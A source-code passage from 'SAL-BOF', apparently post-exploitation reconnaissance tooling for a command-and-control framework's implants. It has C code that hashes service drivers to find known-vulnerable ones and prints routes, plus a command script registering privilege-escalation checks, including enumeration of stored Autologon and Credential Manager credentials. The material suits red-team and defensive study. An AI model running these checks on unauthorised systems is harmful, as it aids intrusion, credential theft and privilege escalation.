BOOL CalculateHash(char * szFilePath, char szFileHash[65], const char * szHashAlg) {

    HANDLE hFile;
    HCRYPTPROV hProv;
    HCRYPTHASH hHash;
    BOOL bResult;
    BYTE rgbFile[BUFSIZE];
    DWORD cbRead;
    DWORD cbHash;
    BYTE rgbHash[SHA256LEN];
    CHAR rgbDigits[] = "0123456789abcdef";
    ALG_ID hashAlgId;
    DWORD hashLen;

    if (MSVCRT$_stricmp(szHashAlg, "SHA1") == 0) {
        hashAlgId	= CALG_SHA1;
        hashLen = SHA1LEN;
    }
    else if (MSVCRT$_stricmp(szHashAlg, "SHA256") == 0) {
        hashAlgId = CALG_SHA_256;
        hashLen = SHA256LEN;
    }
    else if (MSVCRT$_stricmp(szHashAlg, "MD5") == 0) {
        hashAlgId = CALG_MD5;
        hashLen = MD5LEN;
    }
    else {
        return FALSE;
    }

    cbHash = hashLen;

    // Open file to hash
    hFile = KERNEL32$CreateFileA(szFilePath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_FLAG_SEQUENTIAL_SCAN, NULL);
    if (hFile == INVALID_HANDLE_VALUE) {
        BeaconPrintf(CALLBACK_OUTPUT,"Error opening %s\n", szFilePath);
        return FALSE;
    }



    // Get handle to crypto provider
    if (!ADVAPI32$CryptAcquireContextA(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
        BeaconPrintf(CALLBACK_OUTPUT,"ADVAPI32$CryptAcquireContextA failed\n");
        KERNEL32$CloseHandle(hFile);
        return FALSE;
    }

    // Initialize hash
    if (!ADVAPI32$CryptCreateHash(hProv, hashAlgId, 0, 0, &hHash)) {
        BeaconPrintf(CALLBACK_OUTPUT,"ADVAPI32$CryptCreateHash failed\n");
        KERNEL32$CloseHandle(hFile);
        ADVAPI32$CryptReleaseContext(hProv, 0);
        return FALSE;
    }


    while ((bResult = KERNEL32$ReadFile(hFile, rgbFile, BUFSIZE, &cbRead, NULL))) {
        if (cbRead == 0) {
            break;
        }

        if (!ADVAPI32$CryptHashData(hHash, rgbFile, cbRead, 0)) {
            BeaconPrintf(CALLBACK_OUTPUT,"ADVAPI32$CryptHashData failed\n");
            ADVAPI32$CryptReleaseContext(hProv, 0);
            ADVAPI32$CryptDestroyHash(hHash);
            KERNEL32$CloseHandle(hFile);
            return FALSE;
        }
    }


    if (!bResult) {
        BeaconPrintf(CALLBACK_OUTPUT,"ReadFile failed\n");
        ADVAPI32$CryptReleaseContext(hProv, 0);
        ADVAPI32$CryptDestroyHash(hHash);
        KERNEL32$CloseHandle(hFile);
        return FALSE;
    }



    // Hash the file
    if (ADVAPI32$CryptGetHashParam(hHash, HP_HASHVAL, rgbHash, &cbHash, 0)) {
        for (DWORD i = 0; i < cbHash; i++) {
            szFileHash[i * 2] = rgbDigits[rgbHash[i] >> 4];
            szFileHash[i * 2 + 1] = rgbDigits[rgbHash[i] & 0xf];
        }

        // null terminate string
        szFileHash[cbHash * 2] = '\0';

        ADVAPI32$CryptDestroyHash(hHash);
        ADVAPI32$CryptReleaseContext(hProv, 0);
        KERNEL32$CloseHandle(hFile);

        return TRUE;
    }
    else {
        BeaconPrintf(CALLBACK_OUTPUT,"ADVAPI32$CryptGetHashParam failed\n");
        ADVAPI32$CryptDestroyHash(hHash);
        ADVAPI32$CryptReleaseContext(hProv, 0);
        KERNEL32$CloseHandle(hFile);
        return FALSE;
    }

}


void go() {
    HKEY servicesKey;
    char resolvedPath[MAX_PATH];
    int NumOfVulnDrivers = 0;

    // Extract all drivers from services
    if (ADVAPI32$RegOpenKeyExA(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\", 0, KEY_READ, &servicesKey) == ERROR_SUCCESS) {
        char serviceSubkeyName[256];
        DWORD subkeyIndex = 0;
        DWORD subkeyNameSize = sizeof(serviceSubkeyName);
        // Iterate over each service
        while (ADVAPI32$RegEnumKeyExA(servicesKey, subkeyIndex++, serviceSubkeyName, &subkeyNameSize, NULL, NULL, NULL, NULL) == ERROR_SUCCESS) {
            HKEY imagePathKey;
            if (ADVAPI32$RegOpenKeyExA(servicesKey, serviceSubkeyName, 0, KEY_READ, &imagePathKey) == ERROR_SUCCESS) {
                char imagePathValue[1024];
                DWORD valueSize = sizeof(imagePathValue);
                // Obtain value of the "ImagePath"
                if (ADVAPI32$RegGetValueA(imagePathKey, NULL, "ImagePath", RRF_RT_REG_SZ, NULL, &imagePathValue, &valueSize) == ERROR_SUCCESS) {
                    // Check if imagePathValue is empty
                    if (imagePathValue[0] == '\0') {
                        ADVAPI32$RegCloseKey(imagePathKey);
                        continue;
                    }

                    // Check if value ends in '.sys'
                    if (MSVCRT$strstr(imagePathValue, ".sys") != NULL) {
                        // Resolve the absolute path of the driver
                        resolveDriverImagePath(imagePathValue, resolvedPath, sizeof(resolvedPath));

                        char FileHash[65];
                        const char* HashAlgos[] = {
                                "SHA1",
                                "SHA256",
                                "MD5"
                        };

                        for (int i = 0; i < sizeof(HashAlgos) / sizeof(HashAlgos[i]); i++) {
                            // Calculate hashes for driver
                            if (CalculateHash(resolvedPath, FileHash, HashAlgos[i])) {
                                if (CompareHashToVuln(FileHash)) {
                                    BeaconPrintf(CALLBACK_OUTPUT,"[VULN_DRIVER] Service \"%s\" has a vulnerable driver: %s - Hash: %s\n", serviceSubkeyName, resolvedPath, FileHash);
                                    NumOfVulnDrivers++;
                                    break;
                                }
                            } else {
                                BeaconPrintf(CALLBACK_OUTPUT, "[VULN_DRIVER] Failed to calculate hash for driver: %s\n", resolvedPath);
                            }
                        }
                    }
                }
                ADVAPI32$RegCloseKey(imagePathKey);
            }
            subkeyNameSize = sizeof(serviceSubkeyName);
        }
        ADVAPI32$RegCloseKey(servicesKey);
    }
    BeaconPrintf(CALLBACK_OUTPUT,"[VULN_DRIVER] Found a total of %d vulnerable drivers\n", NumOfVulnDrivers);
}

================================================
FILE: SAL-BOF/routeprint/base.c
================================================
#include <windows.h>
#include "bofdefs.h"
#include "beacon.h"
#ifndef bufsize
#define bufsize 8192
#endif


char * output __attribute__((section (".data"))) = 0;  // this is just done so its we don't go into .bss which isn't handled properly
WORD currentoutsize __attribute__((section (".data"))) = 0;
HANDLE trash __attribute__((section (".data"))) = NULL; // Needed for x64 to not give relocation error

#ifdef BOF
int bofstart();
void internal_printf(const char* format, ...);
void printoutput(BOOL done);
#endif
char * Utf16ToUtf8(const wchar_t* input);

int bofstart()
{   
    output = (char*)MSVCRT$calloc(bufsize, 1);
    currentoutsize = 0;
    return 1;
}

void internal_printf(const char* format, ...){
    int buffersize = 0;
    int transfersize = 0;
    char * curloc = NULL;
    char* intBuffer = NULL;
    va_list args;
    va_start(args, format);
    buffersize = MSVCRT$vsnprintf(NULL, 0, format, args); // +1 because vsprintf goes to buffersize-1 , and buffersize won't return with the null
    va_end(args);
    
    // vsnprintf will return -1 on encoding failure (ex. non latin characters in Wide string)
    if (buffersize == -1)
        return;
    
    char* transferBuffer = (char*)intAlloc(bufsize);
    intBuffer = (char*)intAlloc(buffersize);
    /*Print string to memory buffer*/
    va_start(args, format);
    MSVCRT$vsnprintf(intBuffer, buffersize, format, args); // tmpBuffer2 has a null terminated string
    va_end(args);
    if(buffersize + currentoutsize < bufsize) // If this print doesn't overflow our output buffer, just buffer it to the end
    {
        //BeaconFormatPrintf(&output, intBuffer);
        memcpy(output+currentoutsize, intBuffer, buffersize);
        currentoutsize += buffersize;
    }
    else // If this print does overflow our output buffer, lets print what we have and clear any thing else as it is likely this is a large print
    {
        curloc = intBuffer;
        while(buffersize > 0)
        {
            transfersize = bufsize - currentoutsize; // what is the max we could transfer this request
            if(buffersize < transfersize) //if I have less then that, lets just transfer what's left
            {
                transfersize = buffersize;
            }
            memcpy(output+currentoutsize, curloc, transfersize); // copy data into our transfer buffer
            currentoutsize += transfersize;
            if(currentoutsize == bufsize)
            {
            printoutput(FALSE); // sets currentoutsize to 0 and prints
            }
            memset(transferBuffer, 0, transfersize); // reset our transfer buffer
            curloc += transfersize; // increment by how much data we just wrote
            buffersize -= transfersize; // subtract how much we just wrote from how much we are writing overall
        }
    }
    intFree(intBuffer);
    intFree(transferBuffer);
}

void printoutput(BOOL done)
{

    char * msg = NULL;
    BeaconOutput(CALLBACK_OUTPUT, output, currentoutsize);
    currentoutsize = 0;
    memset(output, 0, bufsize);
    if(done) {MSVCRT$free(output); output=NULL;}
}


#ifdef DYNAMIC_LIB_COUNT


typedef struct loadedLibrary {
    HMODULE hMod; // mod handle
    const char * name; // name normalized to uppercase
}loadedLibrary, *ploadedLibrary;
loadedLibrary loadedLibraries[DYNAMIC_LIB_COUNT] __attribute__((section (".data"))) = {0};
DWORD loadedLibrariesCount __attribute__((section (".data"))) = 0;

BOOL intstrcmp(LPCSTR szLibrary, LPCSTR sztarget)
{
    BOOL bmatch = FALSE;
    DWORD pos = 0;
    while(szLibrary[pos] && sztarget[pos])
    {
        if(szLibrary[pos] != sztarget[pos])
        {
            goto end;
        }
        pos++;
    }
    if(szLibrary[pos] | sztarget[pos]) // if either of these down't equal null then they can't match
        {goto end;}
    bmatch = TRUE;

    end:
    return bmatch;
}

FARPROC DynamicLoad(const char * szLibrary, const char * szFunction)
{
    FARPROC fp = NULL;
    HMODULE hMod = NULL;
    DWORD i = 0;
    DWORD liblen = 0;
    for(i = 0; i < loadedLibrariesCount; i++)
    {
        if(intstrcmp(szLibrary, loadedLibraries[i].name))
        {
            hMod = loadedLibraries[i].hMod;
        }
    }
    if(!hMod)
    {
        hMod = LoadLibraryA(szLibrary);
        if(!hMod){ 
            BeaconPrintf(CALLBACK_ERROR, "*** DynamicLoad(%s) FAILED!\nCould not find library to load.", szLibrary);
            return NULL;
        }
        loadedLibraries[loadedLibrariesCount].hMod = hMod;
        loadedLibraries[loadedLibrariesCount].name = szLibrary; //And this is why this HAS to be a constant or not freed before bofstop
        loadedLibrariesCount++;
    }
    fp = GetProcAddress(hMod, szFunction);

    if (NULL == fp)
    {
        BeaconPrintf(CALLBACK_ERROR, "*** DynamicLoad(%s) FAILED!\n", szFunction);
    }
    return fp;
}
#endif


char* Utf16ToUtf8(const wchar_t* input)
{
    int ret = KERNEL32$WideCharToMultiByte(
        CP_UTF8,
        0,
        input,
        -1,
        NULL,
        0,
        NULL,
        NULL
    );

    char* newString = (char*)intAlloc(sizeof(char) * ret);

    ret = KERNEL32$WideCharToMultiByte(
        CP_UTF8,
        0,
        input,
        -1,
        newString,
        sizeof(char) * ret,
        NULL,
        NULL
    );

    if (0 == ret)
    {
        goto fail;
    }

retloc:
    return newString;
/*location to free everything centrally*/
fail:
    if (newString){
        intFree(newString);
        newString = NULL;
    };
    goto retloc;
}

//release any global functions here
void bofstop()
{
#ifdef DYNAMIC_LIB_COUNT
    DWORD i;
    for(i = 0; i < loadedLibrariesCount; i++)
    {
        FreeLibrary(loadedLibraries[i].hMod);
    }
#endif
	return;
}


================================================
FILE: SAL-BOF/routeprint/routeprint.c
================================================
#include <windows.h>
#include <iphlpapi.h>
#include "bofdefs.h"
#include "base.c"

#define IPBUF 17
#define IN_ADDR_OF(x) *((struct in_addr *)&(x))

int PrintRoutes()
{
    PMIB_IPFORWARDTABLE IpForwardTable = NULL;
    PIP_ADAPTER_INFO pAdapterInfo = NULL, curAdapter = NULL;
    ULONG Size = 0;
    DWORD Error = 0;
    ULONG adaptOutBufLen = 0;
    CHAR DefGate[16];
    CHAR Destination[IPBUF], Gateway[IPBUF], Netmask[IPBUF];
    unsigned int i;

    /* set required buffer size */

    if (IPHLPAPI$GetAdaptersInfo( NULL, &adaptOutBufLen) == ERROR_BUFFER_OVERFLOW)
    {
       pAdapterInfo = (IP_ADAPTER_INFO *) intAlloc (adaptOutBufLen);
       if (pAdapterInfo == NULL)
       {
           Error = ERROR_NOT_ENOUGH_MEMORY;
           goto Error;
       }
    }

    if( (IPHLPAPI$GetIpForwardTable( NULL, &Size, TRUE )) == ERROR_INSUFFICIENT_BUFFER )
    {
        if (!(IpForwardTable = intAlloc( Size )))
        {
            Error = ERROR_NOT_ENOUGH_MEMORY;
            goto Error;
        }
    }else
    {
        Error = KERNEL32$GetLastError();
        goto Error;
    }
    

    if (((Error = IPHLPAPI$GetAdaptersInfo(pAdapterInfo, &adaptOutBufLen)) == NO_ERROR) &&
        ((Error = IPHLPAPI$GetIpForwardTable(IpForwardTable, &Size, TRUE)) == NO_ERROR))
    {
        MSVCRT$sprintf(DefGate,
                  "%s",
                  pAdapterInfo->GatewayList.IpAddress.String);
       internal_printf("===========================================================================\n");
       internal_printf("Interface List\n");
        /* FIXME - sort by the index! */
        curAdapter = pAdapterInfo;
        while (curAdapter)
        {
           internal_printf("0x%lu ........................... %s\n",
                     curAdapter->Index, curAdapter->Description);
            curAdapter = curAdapter->Next;
        }
       internal_printf("===========================================================================\n");

       internal_printf("===========================================================================\n");
       internal_printf("Active Routes:\n");
       internal_printf( "%-27s%-17s%-14s%-11s%-10s\n",
                  "Network Destination",
                  "Netmask",
                  "Gateway",
                  "Interface",
                  "Metric" );
        for( i = 0; i < IpForwardTable->dwNumEntries; i++ )
        {
            MSVCRT$sprintf( Destination,
                       "%s",
                       WS2_32$inet_ntoa( IN_ADDR_OF(IpForwardTable->table[i].dwForwardDest) ) );
            MSVCRT$sprintf( Netmask,
                       "%s",
                       WS2_32$inet_ntoa( IN_ADDR_OF(IpForwardTable->table[i].dwForwardMask) ) );
            MSVCRT$sprintf( Gateway,
                       "%s",
                       WS2_32$inet_ntoa( IN_ADDR_OF(IpForwardTable->table[i].dwForwardNextHop) ) );

           internal_printf("%17s%17s%17s%16ld%9ld\n",
                      Destination,
                      Netmask,
                      Gateway,
                      IpForwardTable->table[i].dwForwardIfIndex,
                      IpForwardTable->table[i].dwForwardMetric1 );
            
        }
		internal_printf("Default Gateway:%18s\n", DefGate);
		internal_printf("===========================================================================\n");
		internal_printf("Persistent Routes:\n");
        intFree(IpForwardTable);
        intFree(pAdapterInfo);
        return ERROR_SUCCESS;
    }
    else
    {
Error:
        if (pAdapterInfo) intFree(pAdapterInfo);
        if (IpForwardTable) intFree(IpForwardTable);
        return Error;
    }
}

VOID go( 
	IN PCHAR Buffer, 
	IN ULONG Length 
) 
{
	if(!bofstart())
	{
		return;
	}
	PrintRoutes();
	printoutput(TRUE);
};


================================================
FILE: SAL-BOF/sal.axs
================================================
var metadata = {
    name: "SAL-BOF",
    description: "Situation Awareness Local BOFs"
};


var cmd_arp = ax.create_command("arp", "List ARP table", "arp");
cmd_arp.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let bof_path = ax.script_dir() + "_bin/arp." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}"`, "BOF implementation: arp");
});

var cmd_cacls = ax.create_command("cacls", "List user permissions for the specified file or directory, wildcards supported", "cacls C:\\test.txt");
cmd_cacls.addArgString("path", true);
cmd_cacls.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let path = parsed_json["path"];

    let bof_params = ax.bof_pack("wstr", [path]);
    let bof_path = ax.script_dir() + "_bin/cacls." + ax.arch(id) + ".o";

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, "BOF implementation: cacls");
});

var cmd_dir = ax.create_command("dir", "Lists files in a specified directory. Supports wildcards (e.g. \"C:\\Windows\\S*\"). Optionally, it can perform a recursive list with the /s argument", "dir C:\\Users /s");
cmd_dir.addArgString("directory", "", ".\\");
cmd_dir.addArgBool("/s", "Recursive list");
cmd_dir.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let directory = parsed_json["directory"];
    let recursive = 0;

    if(parsed_json["/s"]) { recursive = 1; }

    let bof_params = ax.bof_pack("wstr,int", [directory, recursive]);
    let bof_path = ax.script_dir() + "_bin/dir." + ax.arch(id) + ".o";

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, "BOF implementation: dir");
});

var cmd_env = ax.create_command("env", "List process environment variables", "env");
cmd_env.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let bof_path = ax.script_dir() + "_bin/env." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}"`, "List process environment variables (BOF)");
});

var cmd_ipconfig = ax.create_command("ipconfig", "List IPv4 address, hostname, and DNS server", "ipconfig");
cmd_ipconfig.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let bof_path = ax.script_dir() + "_bin/ipconfig." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}"`, "BOF implementation: ipconfig");
});

var cmd_listdns = ax.create_command("listdns", "List DNS cache entries. Attempt to query and resolve each", "listdns");
cmd_listdns.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let bof_path = ax.script_dir() + "_bin/listdns." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}"`, "BOF implementation: ipconfig /displaydns");
});

var cmd_netstat = ax.create_command("netstat", "Executes the netstat command to display network connections", "netstat");
cmd_netstat.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let bof_path = ax.script_dir() + "_bin/netstat." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}"`, "BOF implementation: netstat");
});

var cmd_nslookup = ax.create_command("nslookup", "Make a DNS query", "nslookup google.com -s 8.8.8.8 -t A");
cmd_nslookup.addArgString("domain", true);
cmd_nslookup.addArgFlagString("-s", "server", "DNS server is the server you want to query", "");
cmd_nslookup.addArgFlagString("-t", "type", "Record type is something like A, AAAA, or ANY", "A");
cmd_nslookup.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let domain = parsed_json["domain"];
    let server = parsed_json["server"];
    let type   = parsed_json["type"];

    let bof_params = ax.bof_pack("cstr,cstr,cstr", [domain, type, server]);
    let bof_path = ax.script_dir() + "_bin/nslookup." + ax.arch(id) + ".o";

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, "BOF implementation: nslookup");
});

var _cmd_privcheck_alwayselevated = ax.create_command("alwayselevated", "Checks if Always Install Elevated is enabled using the registry", "privcheck alwayselevated");
_cmd_privcheck_alwayselevated.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let bof_path = ax.script_dir() + "_bin/alwayselevated." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}"`, "Task: Checks AlwaysInstallElevated");
});
var _cmd_privcheck_hijackablepath = ax.create_command("hijackablepath", "Checks the path environment variable for writable directories (FILE_ADD_FILE) that can be exploited to elevate privileges", "privcheck hijackablepath");
_cmd_privcheck_hijackablepath.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let bof_path = ax.script_dir() + "_bin/hijackablepath." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}"`, "Task: Checks HijackablePath");
});
var _cmd_privcheck_tokenpriv = ax.create_command("tokenpriv", "Lists the current token privileges and highlights known vulnerable ones", "privcheck tokenpriv");
_cmd_privcheck_tokenpriv.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let bof_path = ax.script_dir() + "_bin/tokenpriv." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}"`, "Task: Checks TokenPrivileges");
});
var _cmd_privcheck_unattendfiles = ax.create_command("unattendfiles", "Checks for leftover unattend files that might contain sensitive information", "privcheck unattendfiles");
_cmd_privcheck_unattendfiles.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let bof_path = ax.script_dir() + "_bin/unattendfiles." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}"`, "Task: Checks UnattendFiles");
});
var _cmd_privcheck_unquotedsvc = ax.create_command("unquotedsvc", "Checks for unquoted service paths", "privcheck unquotedsvc");
_cmd_privcheck_unquotedsvc.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let bof_path = ax.script_dir() + "_bin/unquotedsvc." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}"`, "Task: Checks Unquoted Service Path");
});
var _cmd_privcheck_vulndrivers = ax.create_command("vulndrivers", "Checks if any service on the system uses a known vulnerable driver (based on loldrivers.io)", "privcheck vulndrivers");
_cmd_privcheck_vulndrivers.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let bof_path = ax.script_dir() + "_bin/vulndrivers." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}"`, "Task: Checks Vulnerable Drivers");
});
var _cmd_privcheck_autologon = ax.create_command("autologon", "Checks for stored Autologon credentials in the Winlogon registry key", "privcheck autologon");
_cmd_privcheck_autologon.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let bof_path = ax.script_dir() + "_bin/autologon." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}"`, "Task: Checks Autologon Credentials");
});
var _cmd_privcheck_credmanager = ax.create_command("credmanager", "Enumerates credentials stored in Windows Credential Manager", "privcheck credmanager");
_cmd_privcheck_credmanager.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let bof_path = ax.script_dir() + "_bin/credmanager." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}"`, "Task: Checks Credential Manager");
});
var _cmd_privcheck_modautorun = ax.create_command("modautorun", "Checks for modifiable autorun executables in Run/RunOnce registry keys", "privcheck modautorun");
_cmd_privcheck_modautorun.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let bof_path = ax.script_dir() + "_bin/modautorun." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}"`, "Task: Checks Modifiable Autoruns");
});
var _cmd_privcheck_modsvc = ax.create_command("modsvc", "Checks for services with modifiable permissions (DACL) that can be exploited for privilege escalation", "privcheck modsvc");
_cmd_privcheck_modsvc.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let bof_path = ax.script_dir() + "_bin/modsvc." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}"`, "Task: Checks Modifiable Services");
});
var _cmd_privcheck_pshistory = ax.create_command("pshistory", "Checks for PowerShell PSReadLine history file that may contain sensitive commands or credentials", "privcheck pshistory");
_cmd_privcheck_pshistory.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let bof_path = ax.script_dir() + "_bin/pshistory." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}"`, "Task: Checks PowerShell History");
});
var _cmd_privcheck_uacstatus = ax.create_command("uacstatus", "Checks UAC status, integrity level, and local administrator group membership", "privcheck uacstatus");
_cmd_privcheck_uacstatus.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let bof_path = ax.script_dir() + "_bin/uacstatus." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}"`, "Task: Checks UAC Status");
});
var _cmd_privcheck_all = ax.create_command("all", "Run all privilege escalation checks sequentially", "privcheck all");
_cmd_privcheck_all.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let bof_path = ax.script_dir() + "_bin/privcheck_all." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}"`, "PrivCheck: all checks");
});
var cmd_privcheck = ax.create_command("privcheck", "Perform privilege escalation checks");
cmd_privcheck.addSubCommands([_cmd_privcheck_all, _cmd_privcheck_alwayselevated, _cmd_privcheck_autologon, _cmd_privcheck_credmanager, _cmd_privcheck_hijackablepath, _cmd_privcheck_modautorun, _cmd_privcheck_modsvc, _cmd_privcheck_tokenpriv, _cmd_privcheck_unattendfiles, _cmd_privcheck_unquotedsvc, _cmd_privcheck_pshistory, _cmd_privcheck_uacstatus, _cmd_privcheck_vulndrivers]);

var cmd_routeprint = ax.create_command("routeprint", "List IPv4 routes", "routeprint");
cmd_routeprint.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let bof_path = ax.script_dir() + "_bin/routeprint." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}"`, "BOF implementation: route");
});

var cmd_uptime = ax.create_command("uptime", "List system boot time and how long it has been running", "uptime");
cmd_uptime.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let bof_path = ax.script_dir() + "_bin/uptime." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}"`, "BOF implementation: uptime");
});

var cmd_useridletime = ax.create_command("useridletime", "Shows how long the user as been idle, displayed in seconds, minutes, hours and days", "useridletime");
cmd_useridletime.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let bof_path = ax.script_dir() + "_bin/useridletime." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}"`, "BOF implementation: useridletime");
});

var cmd_whoami = ax.create_command("whoami", "List whoami /all, hours and days", "whoami");
cmd_whoami.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let bof_path = ax.script_dir() + "_bin/whoami." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}"`, "BOF implementation: whoami /all");
});

var group_test = ax.create_commands_group("SAL-BOF", [cmd_arp, cmd_cacls, cmd_dir, cmd_env, cmd_ipconfig, cmd_listdns, cmd_netstat, cmd_nslookup, cmd_privcheck, cmd_routeprint, cmd_uptime, cmd_useridletime, cmd_whoami]);
ax.register_commands_group(group_test, ["beacon", "gopher", "kharon"], ["windows"], []);


================================================
FILE: SAL-BOF/uptime/base.c
================================================
#include <windows.h>
#include "bofdefs.h"
#include "beacon.h"
#ifndef bufsize
#define bufsize 8192
#endif


char * output __attribute__((section (".data"))) = 0;  // this is just done so its we don't go into .bss which isn't handled properly
WORD currentoutsize __attribute__((section (".data"))) = 0;
HANDLE trash __attribute__((section (".data"))) = NULL; // Needed for x64 to not give relocation error

#ifdef BOF
int bofstart();
void internal_printf(const char* format, ...);
void printoutput(BOOL done);
#endif
char * Utf16ToUtf8(const wchar_t* input);

int bofstart()
{   
    output = (char*)MSVCRT$calloc(bufsize, 1);
    currentoutsize = 0;
    return 1;
}

void internal_printf(const char* format, ...){
    int buffersize = 0;
    int transfersize = 0;
    char * curloc = NULL;
    char* intBuffer = NULL;
    va_list args;
    va_start(args, format);
    buffersize = MSVCRT$vsnprintf(NULL, 0, format, args); // +1 because vsprintf goes to buffersize-1 , and buffersize won't return with the null
    va_end(args);
    
    // vsnprintf will return -1 on encoding failure (ex. non latin characters in Wide string)
    if (buffersize == -1)
        return;
    
    char* transferBuffer = (char*)intAlloc(bufsize);
    intBuffer = (char*)intAlloc(buffersize);
    /*Print string to memory buffer*/
    va_start(args, format);
    MSVCRT$vsnprintf(intBuffer, buffersize, format, args); // tmpBuffer2 has a null terminated string
    va_end(args);
    if(buffersize + currentoutsize < bufsize) // If this print doesn't overflow our output buffer, just buffer it to the end
    {
        //BeaconFormatPrintf(&output, intBuffer);
        memcpy(output+currentoutsize, intBuffer, buffersize);
        currentoutsize += buffersize;
    }
    else // If this print does overflow our output buffer, lets print what we have and clear any thing else as it is likely this is a large print
    {
        curloc = intBuffer;
        while(buffersize > 0)
        {
            transfersize = bufsize - currentoutsize; // what is the max we could transfer this request
            if(buffersize < transfersize) //if I have less then that, lets just transfer what's left
            {
                transfersize = buffersize;
            }
            memcpy(output+currentoutsize, curloc, transfersize); // copy data into our transfer buffer
            currentoutsize += transfersize;
            if(currentoutsize == bufsize)
            {
            printoutput(FALSE); // sets currentoutsize to 0 and prints
            }
            memset(transferBuffer, 0, transfersize); // reset our transfer buffer
            curloc += transfersize; // increment by how much data we just wrote
            buffersize -= transfersize; // subtract how much we just wrote from how much we are writing overall
        }
    }
    intFree(intBuffer);
    intFree(transferBuffer);
}

void printoutput(BOOL done)
{

    char * msg = NULL;
    BeaconOutput(CALLBACK_OUTPUT, output, currentoutsize);
    currentoutsize = 0;
    memset(output, 0, bufsize);
    if(done) {MSVCRT$free(output); output=NULL;}
}


#ifdef DYNAMIC_LIB_COUNT


typedef struct loadedLibrary {
    HMODULE hMod; // mod handle
    const char * name; // name normalized to uppercase
}loadedLibrary, *ploadedLibrary;
loadedLibrary loadedLibraries[DYNAMIC_LIB_COUNT] __attribute__((section (".data"))) = {0};
DWORD loadedLibrariesCount __attribute__((section (".data"))) = 0;

BOOL intstrcmp(LPCSTR szLibrary, LPCSTR sztarget)
{
    BOOL bmatch = FALSE;
    DWORD pos = 0;
    while(szLibrary[pos] && sztarget[pos])
    {
        if(szLibrary[pos] != sztarget[pos])
        {
            goto end;
        }
        pos++;
    }
    if(szLibrary[pos] | sztarget[pos]) // if either of these down't equal null then they can't match
        {goto end;}
    bmatch = TRUE;

    end:
    return bmatch;
}

FARPROC DynamicLoad(const char * szLibrary, const char * szFunction)
{
    FARPROC fp = NULL;
    HMODULE hMod = NULL;
    DWORD i = 0;
    DWORD liblen = 0;
    for(i = 0; i < loadedLibrariesCount; i++)
    {
        if(intstrcmp(szLibrary, loadedLibraries[i].name))
        {
            hMod = loadedLibraries[i].hMod;
        }
    }
    if(!hMod)
    {
        hMod = LoadLibraryA(szLibrary);
        if(!hMod){ 
            BeaconPrintf(CALLBACK_ERROR, "*** DynamicLoad(%s) FAILED!\nCould not find library to load.", szLibrary);
            return NULL;
        }
        loadedLibraries[loadedLibrariesCount].hMod = hMod;
        loadedLibraries[loadedLibrariesCount].name = szLibrary; //And this is why this HAS to be a constant or not freed before bofstop
        loadedLibrariesCount++;
    }
    fp = GetProcAddress(hMod, szFunction);

    if (NULL == fp)
    {
